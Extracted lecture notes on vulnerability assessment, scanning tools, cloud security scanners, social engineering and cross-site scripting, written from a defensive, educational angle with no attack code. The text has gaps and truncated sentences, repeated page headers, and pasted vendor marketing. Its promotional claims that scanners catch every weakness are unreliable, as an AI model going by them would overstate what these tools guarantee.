current security measures and procedures, ensuring that nothing in the scope
of information security management system is overlooked, working with
management to set goals with a timeframe to complete them, and getting
written approval prior to beginning any assessment activity.
Vulnerability Assessment
In this phase, a vulnerability scan will be performed to identify vulnerabilities in
the OS, web application, webserver, and other services. This phase helps
identify the category and criticality of the vulnerability and minimizes the level
of risk. This is the step where penetration testing begins.
Risk Assessment
In this phase,risks are identified, characterized, and classified with risk control
techniques.Vulnerabilities are categorized based on impact level (like Low,
Medium, High). This is where you have to present reports that identify
problems and the risk treatment plan to protect the information
Remediation
Refer to performing the steps that are used to mitigate the founded
vulnerabilities according to impact level. In this phase, the response team
designs mitigation processes to cover vulnerabilities.
Verification
This phase helps verify whether all the previous phases were properly
employed or not. It is also where the verification of remedies is performed.This

DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
Vulnerability assessment tools are based on the type of system
they scan and can provide a detailed look into various
vulnerabilities. These automated scans help organizations
continuously monitor their networks and ensure their
environment complies with industry and government regulations.

Hacker-powered testing uses a combination of automated and


manual techniques to scan applications more thoroughly. Ethical
hackers are security experts who help organizations discover and
remediate vulnerabilities before bad actors exploit them. These
hackers use their expertise to find bugs and critical vulnerabilities
missed by automated scans. Let’s look at a few different types of
vulnerability scanning tools used during an assessment.

Network-based scanners identify vulnerabilities on both wired


and wireless networks, and they include features such as network
mapping, protocol analysis, and traffic capture. Network-based
scanners map out a network in the early stages of a vulnerability
assessment and identify vulnerabilities in services, open-ports,
and network infrastructure.

Host-based vulnerability scanners focus on identifying network


weaknesses in different host machines, such as servers or
workstations. These scanners identify misconfigurations,
unpatched systems, and improper permission settings.

Database vulnerability scanners find weaknesses in database


systems and development environments. These scanners discover

DEPARTMENT OF AI&DS
vulnerabilities in database architecture and identify areas where
attackers could inject malicious code to illegally obtain
information without permission.

Many of the available vulnerability assessment tools are free and


open-source, and they offer integration with other security suites
or Security Event Information Management (SIEM) systems. Let’s
look at a few of the available tools.

Burp Suite offers automated vulnerability scanning tools for


internal and external testing. Over 14,000 organizations actively
use Burp Suite to automate web vulnerability scanning.

Pros

 A large and active community

 Simple interface and user-friendly design

 Supported automated scanning and simulated threat scenarios

Cons

 The community (free) edition provides limited features compared


to the enterprise edition

Nessus is software that offers in-depth vulnerability scanning


through a subscription-based service. Hackers use Nessus to

DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
Intruder.io provides a combination of penetration testing and
vulnerability scanning tools. Organizations can use Intruder.io to
run single assessments or continuously monitor their
environments for threats.

Pros

 Easy to configure

 Responsive support

Cons

 Offers little in-depth reporting

Web Application Attack and Audit Framework, or w3af, is a free,


open-source framework that discovers vulnerabilities and helps
ethical hackers exploit them on the application layer. The
framework is written entirely in Python and is one of the easier
vulnerability tools to use, thanks to its intuitive interface.

Pros

 Free

 Simple installation in Linux® environments

Cons

 Offers less support than paid tools

 Windows® version might be difficult to install

DEPARTMENT OF AI&DS
One of the more popular open-source network scanning tools,
Network Mapper (Nmap) is a staple among new and experienced
hackers. Nmap uses multiple probing and scanning techniques to
discover hosts and services on a target network.

Pros

 Free

 Includes stealth scanning methods to avoid IDS

 Offers GUI functionality through Zenmap

Cons

 Is not updated as frequently as paid tools

OpenSCAP is another open-source framework providing


cybersecurity tools for Linux platforms. OpenSCAP offers an
extensive suite of tools that support scanning on web
applications, network infrastructure, databases, and host
machines.

Pros

 Focuses on automating assessments

 Free and open-source

Cons

 Steeper learning curve than similar tools

DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
When developers deploy a patch, they’ll have the option to
request a retest. Retesting is a manual process where the hacker
will attempt to find the same vulnerability post-patching. Retests
are a quick way for developers to receive validation that their
patch is working as intended.

HackerOne Assessments provide on-demand, continuous security


testing for your organization including new capabilities for AWS
customers including AWS Certified hackers, HackerOne
Assessments: Application for Pentest, and AWS Security Hub. The
platform allows you to track progress through the kickoff,
discovery, testing, retesting, and remediation phases of an
engagement. Whether you’re looking to meet regulatory
standards, launch a product, or prove compliance, we’ll help your
security teams find and close flaws before cybercriminals exploit
them.

HackerOne delivers access to the world’s largest and most diverse


community of hackers in the world. Contact us to learn how you
can start leveraging hacker-powered security today.
Vulnerability Assessment (VA) tools are essential for identifying and managing
security vulnerabilities in computer systems, networks, and applications. These tools
help organizations proactively identify weaknesses in their IT infrastructure before
malicious actors can exploit them. Here are some popular Vulnerability Assessment
tools:

1. Nessus:
 Nessus is one of the most widely used vulnerability assessment tools. It
scans networks for vulnerabilities and provides detailed reports. It
supports various platforms and offers both free and commercial
versions.
2. OpenVAS (Open Vulnerability Assessment System):
 OpenVAS is an open-source vulnerability scanner that is part of the
Greenbone Security Manager (GSM) solution. It's designed to detect
vulnerabilities in networks and applications.

DEPARTMENT OF AI&DS
3. Qualys:
 Qualys is a cloud-based security and compliance management
platform. It provides a suite of tools for vulnerability management,
including vulnerability scanning, policy compliance, and web
application scanning.
4. Nexpose (Rapid7 InsightVM):
 Nexpose, now part of Rapid7's InsightVM, is a vulnerability
management solution that helps organizations prioritize and remediate
security risks. It offers advanced scanning capabilities and reporting.
5. Acunetix:
 Acunetix is a web application security scanner that helps identify
vulnerabilities in web applications. It checks for common web
vulnerabilities such as SQL injection, cross-site scripting (XSS), and
more.
6. Burp Suite:
 Burp Suite is primarily known as a web application security testing tool,
but it also includes features for general security testing. It's widely used
for manual and automated testing of web applications.
7. Retina (BeyondTrust):
 Retina is a vulnerability management tool that provides comprehensive
scanning and assessment of network vulnerabilities. It helps
organizations prioritize and remediate security issues.
8. IBM Security AppScan:
 IBM Security AppScan is designed for testing web applications and
mobile applications for security vulnerabilities. It offers dynamic
analysis (DAST) and static analysis (SAST) capabilities.
9. OWASP ZAP (Zed Attack Proxy):
 ZAP is an open-source security testing tool for finding vulnerabilities in
web applications. It's maintained by the Open Web Application Security
Project (OWASP) and is often used for manual and automated security
testing.
10. Tenable.io:
 Tenable.io is a cloud-based vulnerability management platform that
provides vulnerability scanning, assessment, and reporting capabilities.
It offers a centralized view of an organization's security posture.

Scanning for cloud-based vulnerabilities is an essential cybersecurity practice in the


tech world.

DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
 Scanning systems and networks for security vulnerabilities
 Performing ad-hoc security tests whenever they are needed
 Tracking, diagnosing, and remediating cloud vulnerabilities
 Identifying and resolving wrong configurations in networks

Here are the top 5 vulnerability scanners for cloud security:

Intruder Cloud Security


Intruder is a Cloud Vulnerability Scanning Tool specially designed for scanning AWS,
Azure, and Google Cloud. This is a highly proactive cloud-based vulnerability scanner
that detects every form of cybersecurity weakness in digital infrastructures.

The intruder is highly efficient because it finds cyber security weaknesses in exposed
systems to avoid costly data breaches.

The strength of this vulnerability scanner for cloud-based systems is in its perimeter
scanning abilities. It is designed to discover new vulnerabilities to ensure the
perimeter can’t be easily breached or hacked. In addition, it adopts a streamlined
approach to bugs and risk detection.

Hackers will find it very difficult to breach a network if an Intruder Cloud Security
Scanner is used. It will detect all the weaknesses in a cloud network to help
prevent hackers from finding those weaknesses.

DEPARTMENT OF AI&DS
The intruder also offers a unique threat interpretation system that makes the process
of identifying and managing vulnerabilities an easy nut to crack. This is highly
recommended.

Aqua Cloud Security


Aqua Cloud Security is a vulnerability scanner designed for scanning, monitoring, and
remediating configuration issues in public cloud accounts according to best practices
and compliance standards across cloud-based platforms such as AWS, Azure, Oracle
Cloud, and Google Cloud.

It offers a complete Cloud-Native Application Protection Platform.

DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
analysis, Kubernetes security, serverless security, container security, virtual machine
security, and cloud-based platform integrations.

Aqua Cloud Security Scanner offers users different CSPM editions that
include SaaS and Open-Source Security. It helps secure the configuration of
individual public cloud services with CloudSploit and performs comprehensive
solutions for multi-cloud security posture management.

Mistakes are almost inevitable within a complex cloud environment, and if not
adequately checked, it could lead to misconfiguration that can escalate to serious
security issues.

Hence, Aqua Cloud Security devised a comprehensive approach to prevent data


breaches.

Qualys Cloud Security


Qualys Cloud Security is an excellent cloud computing platform designed to identify,
classify, and monitor cloud vulnerabilities while ensuring compliance with internal
and external policies.

This vulnerability scanner prioritizes scanning and remediation by automatically


finding and eradicating malware infections on web applications and system websites.

DEPARTMENT OF AI&DS
Qualys provides public cloud integrations that allow users to have total visibility of
public cloud deployments.

Most public cloud platforms operate on a “shared security responsibility” model,


which means users are expected to protect their workload in the cloud. This can be a
daunting task if done manually, so most users will rather employ vulnerability
scanners.

Qualys provides complete visibility with end-to-end IT security and compliance with
hybrid IT and AWS deployments. It continuously monitors and assesses AWS assets
and resources for security issues, misconfigurations, and non-standard deployments.

It is the perfect vulnerability scanner for scanning cloud environments and detecting
vulnerabilities in complex internal networks.

It has a central single-panel-of-glass interface and CloudView dashboard that allows


users to view monitored web apps and all AWS assets across multiple accounts
through a centralized UI.

Rapid7 Insight Cloud Security


Rapid7 InsightCloudSec platform is one of the best vulnerability scanners for cloud
security. This vulnerability scanner is designed to keep cloud services secure.

It features an insight platform that provides web application security, vulnerability


management, threat command, bug detection, and response, including cloud
security expert management and consulting services.

The secure cloud services provided by Rapid7 InsightCloudSec help to drive the
business forward in the best possible ways. It also enables users to drive innovation
through continuous security and compliance.

DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
This vulnerability scanner will create less work for cloud security and DevOps teams
because cloud deployments are automatically optimized with unified protection.

Its features include automated cloud vulnerability discovery, detecting and


preventing threats, and continuous runtime protection, including EDR for cloud
workloads and containers.

Furthermore, it allows web developers to build and run web applications knowing
they are fully protected from a data breach. As a result, when threats are hunted and
eradicated, cloud applications will run smoothly and faster while working with the
utmost efficiency.

Conclusion

Vulnerability scanners are essential for cloud security because they can easily detect
system weaknesses and prioritize effective fixes. This will help reduce the workload
on security teams in organizations. Each of the vulnerability scanners reviewed in this
guide offers excellent benefits.

These vulnerability scanners allow users to perform scans by logging into the website
as authorized users. When this happens, it automatically monitors and scans areas of
weakness in the systems.

It also identifies any form of anomalies in a network packet configuration to block


hackers from exploiting system programs. Automated vulnerability assessment is
very crucial for cloud security services.

So, vulnerability scanners can detect thousands of vulnerabilities and identify the
actual risk of these vulnerabilities by validating them.

Once these have been achieved, they then prioritize remediation based on the risk
level of these vulnerabilities. All five vulnerability scanners reviewed are tested and
trusted, so users do not need to worry about any form of deficiency.

Finally, it is essential to note that vulnerability scanning is different from penetration


testing.

Vulnerability scanners discover vulnerabilities and classify them based on their threat
level. They correlate them with software, devices, and operating systems that are
connected to a cloud-based network. Misconfigurations are also detected on the
network.

DEPARTMENT OF AI&DS
However, penetration testing deploys a different method that involves exploiting the
detected vulnerabilities on a cloud-based network. So, penetration testing is carried
out immediately after vulnerability scanning has been done.

Both cloud security processes are similar and focused on ensuring web applications
and networks are safe and protected from threats.

Cloud-based vulnerability scanners offer the advantage of scalability, flexibility, and


ease of management, as they are hosted and maintained in the cloud. These tools
are particularly well-suited for organizations that operate in cloud environments or
have a distributed infrastructure. Here are some popular cloud-based vulnerability
scanners:

1. Tenable.io:
 Tenable.io, the cloud version of Tenable's Nessus, provides vulnerability
scanning, assessment, and management capabilities. It offers features
like asset discovery, prioritization, and integration with other security
tools.
2. Qualys Cloud Platform:
 Qualys is known for its cloud-based security and compliance platform.
The Qualys Cloud Platform includes various modules for vulnerability
management, policy compliance, and web application scanning.
3. Rapid7 InsightVM:
 Rapid7's InsightVM is a cloud-based vulnerability management solution
that helps organizations identify and remediate security risks. It
provides real-time visibility into the security posture of your assets.
4. Acunetix (Acunetix 360):
 Acunetix offers a cloud-based version, Acunetix 360, which is designed
for web application security testing. It includes features such as
automated scanning, vulnerability assessment, and integration with
CI/CD pipelines.
5. Detectify:
 Detectify is a cloud-based web application security scanner that focuses
on detecting vulnerabilities in web applications. It offers continuous
monitoring and integrates well with development workflows.
6. CloudMapper:
 CloudMapper is an open-source tool developed by Duo Security (now
part of Cisco) for visualizing and assessing the security of Amazon Web
Services (AWS) environments. It helps identify potential
misconfigurations and security issues.
7. AWS Inspector:
 AWS Inspector is a security assessment service provided by Amazon
Web Services. It automatically assesses applications for vulnerabilities

DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
DEPARTMENT OF AI&DS
UNIT V

HACKING TECHNIQUES AND TOOLS SOCIAL

ENGINEERING

Social engineering adds a human element to the attacker's toolkit in web application security.
While vulnerability assessments and scanners target technical weaknesses, social engineering
exploits human psychology to manipulate users into compromising the security of web
applications.

Attacks of social engineering:

Target Selection: Attackers often target specific individuals within an organization who have
access to sensitive data or systems related to the web application. They might gather information
about these individuals through social media, professional networking sites, or even phishing
attempts.

Deception Tactics: Once a target is identified, attackers employ various deception tactics to trick
them into divulging sensitive information or performing actions that compromise security. Some
common tactics include:

• Phishing Emails: These emails appear to be from legitimate sources (e.g., IT


department, bank) and often create a sense of urgency or fear to pressure the victim into
clicking malicious links or attachments that can steal credentials or install malware.
• Pretexting: Attackers fabricate a scenario (e.g., posing as a customer service
representative) to gain the victim's trust and then trick them into revealing sensitive
information or granting access to systems.

DEPARTMENT OF AI&DS Page 1


• Quid Pro Quo: Attackers offer something in exchange for the victim's cooperation,
such as fake technical support or promises of unlocking features within the web
application.

Bypassing Security Controls: Successful social engineering attacks can bypass technical security
controls put in place to protect web applications. If an attacker tricks a user into revealing their
login credentials, they can access the web application directly, bypassing firewalls or
authentication mechanisms.

Impact on Web Application Security:

• Data Breaches: Social engineering attacks can lead to data breaches if attackers gain
access to user accounts or databases containing sensitive information.
• Account Takeover: Attackers can use stolen credentials to take over user accounts within
the web application, potentially causing financial damage or reputational harm.
• Malware Installation: Social engineering tactics can be used to trick users into installing
malware on their devices, which can then be used to steal data, launch further attacks, or
disrupt operations.

Protecting Against Social Engineering:

• Security Awareness Training: Educating employees about social engineering tactics and
best practices for identifying and avoiding them is crucial.
• Multi-Factor Authentication (MFA): Implementing MFA adds an extra layer of
security, making it more difÏcult for attackers to access accounts even if they steal
login credentials.
• Phishing Simulations: Conducting regular phishing simulations can help employees
identify suspicious emails and avoid falling victim to them.

DEPARTMENT OF AI&DS Page 2


• Least Privilege Access: Limiting user access to only the systems and data they need
for their job functions can minimize the damage caused by a successful social
engineering attack.

CROSS SITE SCRIPTING(XSS);

Definition:

Cross-Site Scripting (XSS) is a type of web security vulnerability that allows attackers to inject
malicious scripts into otherwise trusted websites or web applications. These scripts are then
executed by the victim's browser, potentially compromising their session, stealing data, or
redirecting them to malicious websites.

How XSS Works:

1. Attacker injects malicious script: The attacker injects malicious code, often in the form
of JavaScript, into a vulnerable field on a web application. This could be a search bar, a
comment section, or even a user profile.
2. Victim unknowingly interacts: The victim unknowingly interacts with the application,
causing the malicious script to be sent to their browser.
3. Browser executes the script: The victim's browser treats the malicious script as
legitimate code and executes it within the context of the web application.
4. Attacker gains control: The malicious script can then perform various actions on the
victim's browser, such as stealing cookies (session data), logging keystrokes, or
redirecting the user to a phishing site.

Types of XSS:

DEPARTMENT OF AI&DS Page 3


• Reflected XSS: The malicious script is reflected back to the victim's browser
immediately after it's submitted. This is the most common type of XSS.
• Stored XSS: The malicious script is permanently stored on the web server and is delivered
to any user who views the affected page.
• DOM-based XSS: The malicious script manipulates the Document Object Model (DOM)
of the web page without being stored on the server.

XSS Detection and Prevention Tools:

• Web Application Scanners: These tools can automatically scan web applications for
vulnerabilities like XSS. Popular options include Acunetix, Netsparker, and Burp
Suite.
• Security Code Analysis Tools: These tools can analyze source code for potential security
vulnerabilities, including XSS. Examples include SAST (Static Application Security
Testing) tools like Fortify and CodeSonar.
• Web Application Firewalls (WAFs): These firewalls can help to detect and block
malicious trafÏc, including XSS attacks, before it reaches the web application.

Advantages of Addressing XSS:

• Enhanced Security: Fixing XSS vulnerabilities significantly reduces the risk of attackers
compromising user sessions, stealing data, or launching further attacks.
• Improved User Trust: By addressing XSS vulnerabilities, organizations can build
trust with users by demonstrating their commitment to protecting user data and
privacy.
• Compliance with Regulations: Many data privacy regulations require organizations to
implement security measures to protect user data. Fixing XSS vulnerabilities helps
organizations comply with these regulations.

DEPARTMENT OF AI&DS Page 4


Disadvantages of Ignoring XSS:

• Increased Risk of Attacks: Unpatched XSS vulnerabilities leave web applications


vulnerable to attack, potentially leading to data breaches and other security incidents.
• Reputational Damage: A successful XSS attack can damage an organization's
reputation, leading to lost business and customer trust.
• Regulatory Fines: Failure to comply with data privacy regulations due to unaddressed
XSS vulnerabilities can result in significant fines.

DEPARTMENT OF AI&DS Page 5

You might also like